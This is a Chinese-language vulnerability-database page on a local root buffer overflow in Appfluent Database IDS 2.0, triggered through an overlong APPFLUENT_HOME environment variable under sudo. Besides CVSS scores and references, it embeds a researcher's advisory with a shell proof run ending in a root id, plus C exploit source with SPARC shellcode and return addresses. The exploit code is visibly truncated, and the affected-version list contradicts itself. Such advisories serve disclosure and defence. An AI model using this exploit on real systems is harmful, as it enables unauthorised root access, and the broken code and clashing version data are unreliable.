发布时间 :2005-12-07 20:03:00
修订时间 :2008-09-05 16:56:03

[原文]Buffer overflow in Appfluent Technology Database IDS 2.0 allows local users to execute arbitrary code via a long APPFLUENT_HOME environment variable.

[CNNVD]Appfluent Technology Database IDS APPFLUENT_HOME变量缓冲区溢出漏洞(CNNVD-200512-126)

        Appfluent Technology Database IDS 2.0中存在缓冲区溢出漏洞,本地用户可以通过长APPFLUENT_HOME环境变量执行任意代码。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BID  15755
(UNKNOWN)  FULLDISC  20051207 Appfluent Batabase IDS Local Root

- 漏洞信息

Appfluent Technology Database IDS APPFLUENT_HOME变量缓冲区溢出漏洞
中危 缓冲区溢出
2005-12-07 00:00:00 2005-12-07 00:00:00
        Appfluent Technology Database IDS 2.0中存在缓冲区溢出漏洞,本地用户可以通过长APPFLUENT_HOME环境变量执行任意代码。

- 公告与补丁


- 漏洞信息 (1360)

Appfluent Database IDS < (Env Variable) Local Exploit (EDBID:1360)
solaris local
2005-12-07 Verified
0 c0ntex
N/A [点击下载]
  $ An open security advisory #14 - Appfluent Database IDS Environment Variable Overflow
  1: Bug Researcher: c0ntex - c0ntexb[at] -+-
  2: Bug Released: December 07th 2005
  3: Bug Impact Rate: Hi
  4: Bug Scope Rate: Local root
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  Appfluent Database IDS v2.0

  "Appfluent Technology is the leading provider of data usage and query performance software designed to
  help IT organizations improve performance of Business Intelligence (BI) and enterprise applications,
  reduce the number of databases they maintain and quickly deploy new applications. Appfluent provides a
  suite of products that clean up and consolidate databases, optimize query performance based on usage,
  and rapidly analyze applications for both test and production environments."
  Appfluent provide a Database IDS system that monitors all SQL traffic in real time, logging every user
  defined transaction to a database, providing an audit trail of all transactions that take place. There
  are several processes that ecumulate together to provide the IDS solution, including watcher, analyser,
  alerter and reporter.

  There is a stack based buffer overflow in all binaries that allow for some malicious attacker to gain
  unauthorised code execution on the system where the application is installed. Due to incorrect use of
  strcpy(), and a lack of correct bounds checking, a user can manipulate the $APPFLUENT_HOME environment
  variable to overflow the stack buffer.

  The problem is specific to the watcher process, as it needs to be run as root due to the fact that it
  sniffs all traffic going to an interface. A script installed in $APPFLUENT_HOME/server_oracle/bin is
  supplied so that administrators can run the process via sudo.

  When run with sudo, we are provided a vector for root compromise as a default sudo install on Solaris
  (this example) and other operating systems honour the setting of environment variables. As such, when
  an attacker crafts $APPFLUENT_HOME in a malicious manner and runs the watcher process, root access to
  the system is gained.

  There are a few requirements that need to be met for the attack to be successful, and they include:

  	1) User is in the sudoers file and is defined as able to run the watcher process
	2) Sudo honours environment variables, meaning env_reset or the likes is not set

  Please note that users must set, or have $APPFLUENT_HOME set for the product to work, and if the above
  two requirements are met, an attacker is guaranteed to gain unauthorised root access to the system.

  Appfluent have released a fix and is provided in the latest version of the product => Ver:

  ## Proof run with a default sudo install from sunfreeware.
  [c0ntex@ ~/vuln]$ export SHELLCODE=`printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
  [c0ntex@ ~/vuln]$ export APPFLUENT_HOME=`perl -e 'print "A" x 576'``printf "\xff\xbe
  [c0ntex@ ~/vuln]$ sudo /tmp/watch/watcher -sc
  do_process: Exception:
    file: file_stream.cpp
    line: 338
  /config/config : 78 : File name too long
    code: 78
  #0  void IC::ConfigFile::load(IC::StrP) at config_file.cpp:35
  #1  virtual void IC::ServerConfig::load() at /home/ask/lab/v2_0/app/product/server/lib/libserverconfig/server_config.cpp:70
  #2  virtual void IC::Watch::run(bool, bool) at /home/ask/lab/v2_0/app/product/server/lib/libwatch/watch.cpp:41
  #3  int do_process(bool) at /home/ask/lab/v2_0/app/product/server/bin/watch/do_process.cpp:21

  # uname -a
  SunOS  5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2
  # id -a
  uid=0(root) gid=1(other) groups=1(other),0(root),2(bin),3(sys),4(adm),5(uucp),6(mail

  Greetings to everyone I know  ;-)


  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <unistd.h>

  #define DAHBUF   591
  #define NOP      0x90
  #define SUDO     "/usr/local/bin/sudo"
  #define VULN     "watcher"
  #define WOPT     "-sc"

  char shellcode[] = "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"

  char retloc[] = "\xff\xbe\xfd\xe9";
  char retlok[] = "\xff\xbe\xfd\xed";

  int main()
        char env[DAHBUF+9];

        puts("\nLocal root proof of concept for Appfluent IDS Watcher environment overflow");
        puts("found and developed by c0ntex || ||\n"); 

        memset(env, NOP, DAHBUF);

        memcpy(env + 100, shellcode, strlen(shellcode));
        memcpy(env + DAHBUF, retloc, strlen(retloc));
        memcpy(env + DAHBUF + 4, retlok, strlen(retlok));
        env[DAHBUF+9] = '\0';

        strncpy(&env[0], "APPFLUENT_HOME=", 15);

        if(!env) {


        if(execl(SUDO, SUDO, VULN, WOPT, NULL) < 0) {


// [2005-12-07]

- 漏洞信息

Appfluent Technology Database IDS watcher APPFLUENT_HOME Variable Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-12-07 Unknow
2005-12-07 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Appfluent Technology Database IDS APPFLUENT_HOME Variable Buffer Overflow Vulnerability
Boundary Condition Error 15755
No Yes
2005-12-07 12:00:00 2005-12-07 12:00:00
Discovered by c0ntex <>.

- 受影响的程序版本

Appfluent Technology Database IDS 2.0
Appfluent Technology Database IDS 2.1 .0.103

- 不受影响的程序版本

Appfluent Technology Database IDS 2.1 .0.103

- 漏洞讨论

Appfluent Technology Database IDS is prone to a local buffer overflow vulnerability.

This issue presents itself when the affected application handles a malformed value passed through the APPFLUENT_HOME environment variable.

A successful attack can allow an attacker to execute arbitrary code on the affected computer. A complete compromise may be possible as well.

Appfluent Technology Database IDS 2.0 is reported to be vulnerable. Other versions may be affected as well.

- 漏洞利用

The following exploit is available:

- 解决方案

Reports indicate that this issue has been addressed in Appfluent Database IDS This could not be confirmed by Symantec.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: <>.

- 相关参考